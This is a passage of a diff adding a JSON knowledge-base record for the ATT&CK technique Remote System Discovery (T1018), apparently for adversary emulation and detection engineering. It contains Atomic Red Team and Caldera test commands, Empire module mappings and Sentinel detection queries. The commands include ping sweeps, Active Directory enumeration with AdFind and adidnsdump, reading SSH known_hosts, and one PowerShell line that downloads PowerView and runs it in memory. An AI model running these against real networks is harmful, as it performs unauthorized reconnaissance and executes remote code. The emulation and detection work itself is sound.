"command_prompt" + } + }, + { + "name": "Remote System Discovery - arp", + "auto_generated_guid": "2d5a61f5-0447-4be4-944a-1f8530ed6574", + "description": "Identify remote systems via arp. \n\nUpon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "arp -a\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - arp nix", + "auto_generated_guid": "acb6b1ff-e2ad-4d64-806c-6c35fe73b951", + "description": "Identify remote systems via arp.\n\nUpon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if arp command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v arp)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" + } + ], + "executor": { + "command": "arp -a | grep -v '^?'\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - sweep", + "auto_generated_guid": "96db2632-8417-4dbb-b8bb-a8b92ba391de", + "description": "Identify remote systems via ping sweep.\n\nUpon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "start_host": { + "description": "Subnet used for ping sweep.", + "type": "String", + "default": "1" + }, + "stop_host": { + "description": "Subnet used for ping sweep.", + "type": "String", + "default": "254" + }, + "subnet": { + "description": "Subnet used for ping sweep.", + "type": "String", + "default": "192.168.1" + } + }, + "executor": { + "command": "for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo \"#{subnet}.$ip UP\" || : ; done\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - nslookup", + "auto_generated_guid": "baa01aaa-5e13-45ec-8a0d-e46c93c9760f", + "description": "Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.\n\nUpon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$localip = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\n$pieces = $localip.split(\".\")\n$firstOctet = $pieces[0]\n$secondOctet = $pieces[1]\n$thirdOctet = $pieces[2]\nforeach ($ip in 1..255 | % { \"$firstOctet.$secondOctet.$thirdOctet.$_\" } ) {cmd.exe /c nslookup $ip}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Remote System Discovery - adidnsdump", + "auto_generated_guid": "95e19466-469e-4316-86d2-1dc401b5a959", + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks\nPython 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.\nSuccessful execution of this test will list dns zones in the terminal.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "username including domain.", + "type": "String", + "default": "domain\\user" + }, + "acct_pass": { + "description": "Account password.", + "type": "String", + "default": "password" + }, + "host_name": { + "description": "hostname or ip address to connect to.", + "type": "String", + "default": "192.168.1.1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must have python 3 installed\n", + "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + }, + { + "description": "Computer must have pip installed\n", + "prereq_command": "if (pip3 -V) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"PIP must be installed manually\"\n" + }, + { + "description": "adidnsdump must be installed and part of PATH\n", + "prereq_command": "if (cmd /c adidnsdump -h) {exit 0} else {exit 1}\n", + "get_prereq_command": "pip3 install adidnsdump\n" + } + ], + "executor": { + "command": "adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Adfind - Enumerate Active Directory Computer Objects", + "auto_generated_guid": "a889f5be-2d54-4050-bd05-884578748bb4", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=computer)\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory Domain Controller Objects", + "auto_generated_guid": "5838c31e-a0e2-4b9f-b60a-d79d2cb7995e", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -sc dclist\n", + "name": "command_prompt" + } + }, + { + "name": "Remote System Discovery - ip neighbour", + "auto_generated_guid": "158bd4dd-6359-40ab-b13c-285b9ef6fa25", + "description": "Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ip command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v ip)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "apt-get install iproute2 -y\n" + } + ], + "executor": { + "command": "ip neighbour show\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - ip route", + "auto_generated_guid": "1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1", + "description": "Use the ip route command to display the kernels routing tables. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ip command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v ip)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "apt-get install iproute2 -y\n" + } + ], + "executor": { + "command": "ip route show\n", + "name": "sh" + } + }, + { + "name": "Remote System Discovery - ip tcp_metrics", + "auto_generated_guid": "6c2da894-0b57-43cb-87af-46ea3b501388", + "description": "Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ip command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v ip)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "apt-get install iproute2 -y\n" + } + ], + "executor": { + "command": "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", + "name": "sh" + } + }, + { + "name": "Enumerate domain computers within Active Directory using DirectorySearcher", + "auto_generated_guid": "962a6017-1c09-45a6-880b-adc9c57cb22e", + "description": "This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. \nThis test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. \nReference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). \nUpon successful execution, this test will output the names of the computers that reside on the domain to the console window. \n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "This PC must be joined to a domain.", + "prereq_command": "if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}\t\t", + "get_prereq_command": "write-host \"This PC must be manually added to a domain.\" " + } + ], + "executor": { + "command": "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Enumerate Active Directory Computers with Get-AdComputer", + "auto_generated_guid": "97e89d9e-e3f5-41b5-a90f-1e0825df0fdf", + "description": "The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.\nUpon successful execution a listing of Computers will output with their paths in AD.\nReference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Get-AdComputer -Filter *\n" + } + }, + { + "name": "Enumerate Active Directory Computers with ADSISearcher", + "auto_generated_guid": "64ede6ac-b57a-41c2-a7d1-32c6cd35397d", + "description": "The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.\nUpon successful execution a listing of computers will output with their paths in AD.\nReference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "([adsisearcher]\"objectcategory=computer\").FindAll(); ([adsisearcher]\"objectcategory=computer\").FindOne()\n" + } + }, + { + "name": "Get-DomainController with PowerView", + "auto_generated_guid": "b9d2e8ca-5520-4737-8076-4f08913da2c4", + "description": "Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose\n", + "name": "powershell" + } + }, + { + "name": "Get-wmiobject to Enumerate Domain Controllers", + "auto_generated_guid": "e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad", + "description": "The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.\nUpon successful execution a listing of Systems from AD will output with their paths.\nReference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "get-wmiobject -class ds_computer -namespace root\\directory\\ldap" + } + } + ] + }, + { + "id": "0360ede1-3c28-48d3-a6ef-6e98f562c5af", + "name": "GetComputers (Alice)", + "description": "Get a list of all computers in a domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\PowerView.ps1 -Force;\nGet-NetComputer\n", + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "id": "13379ae1-d20e-4162-91f8-320d78a35e7f", + "name": "Discover local hosts", + "description": "Use PowerView to query the Active Directory server for a list of computers in the Domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1;\nGet-DomainComputer\n", + "parsers": { + "plugins.stockpile.app.parsers.gdomain": [ + { + "source": "remote.host.fqdn" + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + }, + { + "id": "26c8b8b5-7b5b-4de1-a128-7d37fb14f517", + "name": "Discover domain controller", + "description": "Identify the remote domain controllers", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "cmd": { + "command": "nltest /dsgetdc:%USERDOMAIN%\n" + }, + "psh": { + "command": "nltest /dsgetdc:$env:USERDOMAIN\n" + } + } + } + }, + { + "id": "5f77ecf9-613f-4863-8d2f-ed6b447a4633", + "name": "Parse SSH known_hosts", + "description": "View the known_hosts file", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "cat ~/.ssh/known_hosts\n" + } + }, + "linux": { + "sh": { + "command": "cat ~/.ssh/known_hosts\n" + } + } + } + }, + { + "id": "85341c8c-4ecb-4579-8f53-43e3e91d7617", + "name": "Collect ARP details", + "description": "Locate all active IP and FQDNs on the network", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "arp -a", + "parsers": { + "plugins.stockpile.app.parsers.ipaddr": [ + { + "source": "remote.host.ip" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "arp -a", + "parsers": { + "plugins.stockpile.app.parsers.ipaddr": [ + { + "source": "remote.host.ip" + } + ] + } + } + }, + "windows": { + "psh,cmd": { + "command": "arp -a", + "parsers": { + "plugins.stockpile.app.parsers.ipaddr": [ + { + "source": "remote.host.ip" + } + ] + } + } + } + } + }, + { + "id": "ce485320-41a4-42e8-a510-f5a8fe96a644", + "name": "Discover Mail Server", + "description": "Identify the organizations mail server", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "target.org.emailhost" + } + ] + } + } + }, + "darwin": { + "sh": { + "command": "host \"#{target.org.domain}\" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "target.org.emailhost" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "(nslookup -querytype=mx #{target.org.domain}. | Select-String -pattern 'mail' | Out-String).Trim()\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "target.org.emailhost" + } + ] + } + } + } + } + }, + { + "id": "fa4ed735-7006-4451-a578-b516f80e559f", + "name": "Reverse nslookup IP", + "description": "Find hostname of remote IP in domain", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "nslookup #{remote.host.ip}\n", + "parsers": { + "plugins.stockpile.app.parsers.reverse_nslookup": [ + { + "source": "remote.host.fqdn", + "edge": "has_ip", + "target": "remote.host.ip" + } + ] + } + } + } + } + }, + { + "id": "fdf8bf36-797f-4157-805b-fe7c1c6fc903", + "name": "Find Hostname", + "description": "Find hostname of remote host", + "tactic": "discovery", + "technique": { + "attack_id": "T1018", + "name": "Remote System Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "nbtstat -A #{remote.host.ip}" + } + } + } + }, + { + "chain_id": "100165", + "os": "windows", + "parent_process": "net.exe", + "commandline_string": "view /domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "remote_discovery", + "mitre_attack": "T1018", + "itw_sample": "" + }, + { + "chain_id": "100166", + "os": "windows", + "parent_process": "qwinsta.exe", + "commandline_string": "/server:", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "remote_discovery", + "mitre_attack": "T1018", + "itw_sample": "" + }, + { + "chain_id": "100167", + "os": "windows", + "parent_process": "installutil.exe", + "commandline_string": "/logfile= /LogToConsole=false /U *.dll", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1018", + "itw_sample": "" + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_domain_controller", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_domain_controller\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_domain_policy", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_domain_policy\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_domain_trust", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_domain_trust\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_forest", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_forest\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_forest_domain", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_forest_domain\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_site", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_site\": [\"T1018\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/reverse_dns", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/reverse_dns\": [\"T1018\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_computers", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_computers\": [\"T1018\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_domaincontrollers", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_domaincontrollers\": [\"T1018\"]," + }, + { + "Empire Module": "python/situational_awareness/network/gethostbyname", + "ATT&CK Technique #1": "T1018", + "ATT&CK Technique #2": "", + "Technique": "Remote System Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/gethostbyname\": [\"T1018\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_path contains \"net.exe\"or process_path contains \"ping.exe\")and (process_command_line contains \"view\"or process_command_line contains \"ping\")", + "name": "Remote System Discovery Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (process_path contains \"net.exe\"or process_path contains \"ping.exe\")and (process_command_line contains \"view\"or process_command_line contains \"ping\")", + "name": "Remote System Discovery Process" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Win Firewall" + ], + [ + "Network protocol analysis" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": 